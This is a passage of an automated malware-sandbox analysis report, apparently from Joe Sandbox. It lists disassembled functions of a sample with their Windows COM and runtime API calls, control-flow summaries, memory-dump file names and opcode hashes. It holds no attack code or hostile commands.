                                                                                          • VariantClear.OLEAUT32(6D0805A8), ref: 6D024B82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 2515392200-0
                                                                                          • Opcode ID: 5c0c7b5c223ba7d459c733f8f9a242239aa708217516cb45c2241984639825de
                                                                                          • Instruction ID: 159641b49a7b3ca175e4628023666abf017fa221d838c7aa8fe091f15f39f3eb
                                                                                          • Opcode Fuzzy Hash: 5c0c7b5c223ba7d459c733f8f9a242239aa708217516cb45c2241984639825de
                                                                                          • Instruction Fuzzy Hash: 2C515C76A0421AAFDB05DFA4CC84FAEB7BDFF99310F044169E915AB244D735E901CBA0
                                                                                          Function 6D0247D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1525 6d0247d0-6d024848 VariantInit * 3 SafeArrayCreateVector 1526 6d024852-6d024871 SafeArrayPutElement VariantClear 1525->1526 1527 6d02484a-6d02484d 1525->1527 1528 6d024877-6d024882 1526->1528 1529 6d02496f-6d024971 1526->1529 1527->1526 1532 6d024884-6d024889 call 6d07c1e0 1528->1532 1533 6d02488e-6d0248a0 1528->1533 1530 6d024973-6d024974 SafeArrayDestroy 1529->1530 1531 6d02497a-6d0249a6 VariantClear * 3 1529->1531 1530->1531 1532->1533 1533->1529 1536 6d0248a6-6d0248b2 1533->1536 1536->1529 1537 6d0248b8-6d0248f1 1536->1537 1540 6d0248f3-6d0248f8 call 6d07c1e0 1537->1540 1541 6d0248fd-6d02492b 1537->1541 1540->1541 1544 6d02496c 1541->1544 1545 6d02492d-6d024938 1541->1545 1544->1529 1545->1544 1546 6d02493a-6d02494a call 6d01db30 1545->1546 1546->1544 1549 6d02494c-6d02495c call 6d0256b0 call 6d026880 1546->1549 1553 6d024961-6d024968 1549->1553 1553->1544
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02480C
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D024815
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02481B
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D024826
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6D02485B
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024868
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D024974
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024984
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02498A
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024990
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 2515392200-0
                                                                                          • Opcode ID: 1713b1d2f43c9a980aa585ff0c06fc36134b87939b1b7c2e6bbb576a605fa031
                                                                                          • Instruction ID: 18c92196bd157cfb2cf65f003a7875deae67f662fb1921a57b86f5b0da248794
                                                                                          • Opcode Fuzzy Hash: 1713b1d2f43c9a980aa585ff0c06fc36134b87939b1b7c2e6bbb576a605fa031
                                                                                          • Instruction Fuzzy Hash: 1C517B72904209AFDB04DFA8CC80EAEB7B9FF99310F15456DE606EB640D730E905CBA0
                                                                                          Function 6D0266A0 Relevance: 15.2, APIs: 10, Instructions: 155COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1554 6d0266a0-6d026725 VariantInit * 2 SafeArrayCreateVector 1555 6d026727-6d02672a 1554->1555 1556 6d02672f-6d02674f SafeArrayPutElement VariantClear 1554->1556 1555->1556 1557 6d026844-6d026846 1556->1557 1558 6d026755-6d026772 1556->1558 1561 6d026848-6d026849 SafeArrayDestroy 1557->1561 1562 6d02684f-6d026878 VariantClear * 2 1557->1562 1559 6d026774-6d026779 1558->1559 1560 6d02677c-6d02679c SafeArrayPutElement VariantClear 1558->1560 1559->1560 1560->1557 1563 6d0267a2-6d0267b0 1560->1563 1561->1562 1564 6d0267b2-6d0267b7 call 6d07c1e0 1563->1564 1565 6d0267bc-6d0267ef 1563->1565 1564->1565 1577 6d0267f2 call 137d149 1565->1577 1578 6d0267f2 call 137d148 1565->1578 1567 6d0267f4-6d0267f6 1567->1557 1568 6d0267f8-6d026805 1567->1568 1568->1557 1569 6d026807-6d02681c call 6d01db30 1568->1569 1569->1557 1572 6d02681e-6d02683f call 6d0256b0 call 6d026880 1569->1572 1572->1557 1577->1567 1578->1567
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32 ref: 6D0266DB
                                                                                          • VariantInit.OLEAUT32 ref: 6D0266EA
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D026700
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02673A
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026747
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D026787
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026794
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D026849
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02685A
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026861
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
                                                                                          • String ID:
                                                                                          • API String ID: 551789342-0
                                                                                          • Opcode ID: b274a2f7b151074189b0ca44e60457848f8c456effb89fe40e940069aee3b25f
                                                                                          • Instruction ID: 7b3be7f82fe018d3fcfb0c8cf69f9835443da5d176031b9304d55e2e4045ee50
                                                                                          • Opcode Fuzzy Hash: b274a2f7b151074189b0ca44e60457848f8c456effb89fe40e940069aee3b25f
                                                                                          • Instruction Fuzzy Hash: A2515976109206AFDB00CF64C844B5BBBF9EFC9714F01865DF9559B250DB30E905CBA2
                                                                                          Function 6D024170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0241AF
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0241B5
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D0241C0
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D0241F5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024201
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D024450
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02446D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02447D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024483
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 1774866819-0
                                                                                          • Opcode ID: cc5727b2629deb3d238ef06c24d00d556c2ee6e9326bad0d77fa9fd16e7d905d
                                                                                          • Instruction ID: 365909309ad173f3f468b543782ae97fbf2af49f64a12e6681035891403674cd
                                                                                          • Opcode Fuzzy Hash: cc5727b2629deb3d238ef06c24d00d556c2ee6e9326bad0d77fa9fd16e7d905d
                                                                                          • Instruction Fuzzy Hash: FEB13875600609AFDB14DF98C884EBAB7F9BF8D310F15856CE50AAB791DA34F841CB60
                                                                                          Function 6D02C530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02C56F
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02C575
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02C580
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02C5B5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C5C1
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D02C7D4
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02C7F1
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C801
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C807
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 1774866819-0
                                                                                          • Opcode ID: e0d15d691de598d03b70e9f92beba34e6d231a1471fc16714cd1992fa4eac9cb
                                                                                          • Instruction ID: 92d8073afdbde6e9330700f25d88a323657c9fafda5711d447b82051a06b6dc7
                                                                                          • Opcode Fuzzy Hash: e0d15d691de598d03b70e9f92beba34e6d231a1471fc16714cd1992fa4eac9cb
                                                                                          • Instruction Fuzzy Hash: 9FA1397560060AAFDB14DF98C884EAAB7F9BF8D310F15856CE506AB791DB34F841CB60
                                                                                          Function 6D026880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0268B2
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0268BD
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D0268D7
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D0268FD
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026909
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D026923
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D026981
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02699E
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D0269A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
                                                                                          • String ID:
                                                                                          • API String ID: 3529038988-0
                                                                                          • Opcode ID: 21a65ee27d4049effc1de2d143c89a7934e5d665541e94fc307c735fda053aad
                                                                                          • Instruction ID: c15f1eeaa70cc996946e4d38e0c3be4adbbaa4e22edc1b7e0eed0d19e8b5b0b6
                                                                                          • Opcode Fuzzy Hash: 21a65ee27d4049effc1de2d143c89a7934e5d665541e94fc307c735fda053aad
                                                                                          • Instruction Fuzzy Hash: 8A4161B2900209AFDF00DFA4C884BEEBBBDFF99710F154119E905A7240E775E905CBA0
                                                                                          Function 6D01C020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID:
                                                                                          • API String ID: 2610073882-0
                                                                                          • Opcode ID: 8a4b6a4b30ae04fb0fbdde8ed54087d55569804dbe94109af0b34c60f49eb967
                                                                                          • Instruction ID: c7c9b291a7dccb8b84b97e93defa746b18c600417d54be310002838f45e29072
                                                                                          • Opcode Fuzzy Hash: 8a4b6a4b30ae04fb0fbdde8ed54087d55569804dbe94109af0b34c60f49eb967
                                                                                          • Instruction Fuzzy Hash: CAC146716087019FE301DFA8C880A2AF7E5FFC9704F248A5DF9989B265D731E845CB96
                                                                                          Function 6D026B10 Relevance: 9.4, APIs: 6, Instructions: 364COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6D026C8B
                                                                                          • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6D026CA6
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6D026CC7
                                                                                            • Part of subcall function 6D025760: std::tr1::_Xweak.LIBCPMT ref: 6D025769
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D026CF9
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D026F13
                                                                                          • InterlockedCompareExchange.KERNEL32(6D0AC6A4,45524548,4B4F4F4C), ref: 6D026F34
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 2722669376-0
                                                                                          • Opcode ID: 905ee3f90f0f2e89a0b19484df78ca1cde11c7158d72f40e3a2a5ae4e72219d9
                                                                                          • Instruction ID: 305b69ec9f965e8cd9aeae92020f224132c5d06a904126755183ee12e03d1991
                                                                                          • Opcode Fuzzy Hash: 905ee3f90f0f2e89a0b19484df78ca1cde11c7158d72f40e3a2a5ae4e72219d9
                                                                                          • Instruction Fuzzy Hash: CFD1D075A052069FFF11CFA4CC94BAE77F8AF45304F568469EA05AB285D774E800CBE1
                                                                                          Function 6D0116B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D011B53
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D011B5D
                                                                                          • std::exception::exception.LIBCMT ref: 6D011C43
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D011C58
                                                                                          Strings
                                                                                          • invalid vector<T> subscript, xrefs: 6D011B58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
                                                                                          • String ID: invalid vector<T> subscript
                                                                                          • API String ID: 3098024973-3016609489
                                                                                          • Opcode ID: 957ac6aba7bdacc19855007cfd72dde4571b49fa675d28564f797c67e3dd7a69
                                                                                          • Instruction ID: 484df883bae84afc497fd4bc4ef81997553af5adafb00e21a11b4c4936bd6091
                                                                                          • Opcode Fuzzy Hash: 957ac6aba7bdacc19855007cfd72dde4571b49fa675d28564f797c67e3dd7a69
                                                                                          • Instruction Fuzzy Hash: 30225B75C0430A9FDB24CFE4C480AEEBBF5BF44314F118A5DD55AAB650E774AA88CB90
                                                                                          Function 02EBB258 Relevance: 7.8, Strings: 6, Instructions: 323COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (o^q$(o^q$,bq$,bq$Hbq$d8cq
                                                                                          • API String ID: 0-1626189073
                                                                                          • Opcode ID: cb8397bf5d815a8f1af17671fae74dc1984980c73fef138fe546de1dae2221fd
                                                                                          • Instruction ID: 9feff3fae2059de66e8abcbfa8c55b7721dd46dcf22dccb12f14e97517d83d7d
                                                                                          • Opcode Fuzzy Hash: cb8397bf5d815a8f1af17671fae74dc1984980c73fef138fe546de1dae2221fd
                                                                                          • Instruction Fuzzy Hash: 9FC14D34B401188FCB159F69D958AAF7BF6BF88348F149469E905EB3A0DB30DC41CB91
                                                                                          Function 6D01DB30 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(6D0231EC), ref: 6D01DB5E
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D01DB6E
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D01DB82
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D01DBF1
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01DBFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
                                                                                          • String ID:
                                                                                          • API String ID: 182531043-0
                                                                                          • Opcode ID: d0ded9438e5aca6ae866570404eedd3958431eb8eafaafa49a1b412bdb0f18ec
                                                                                          • Instruction ID: 8a07f52cfa88e89e697b24028d29a11180b3993699606bb5714b772fd312650c
                                                                                          • Opcode Fuzzy Hash: d0ded9438e5aca6ae866570404eedd3958431eb8eafaafa49a1b412bdb0f18ec
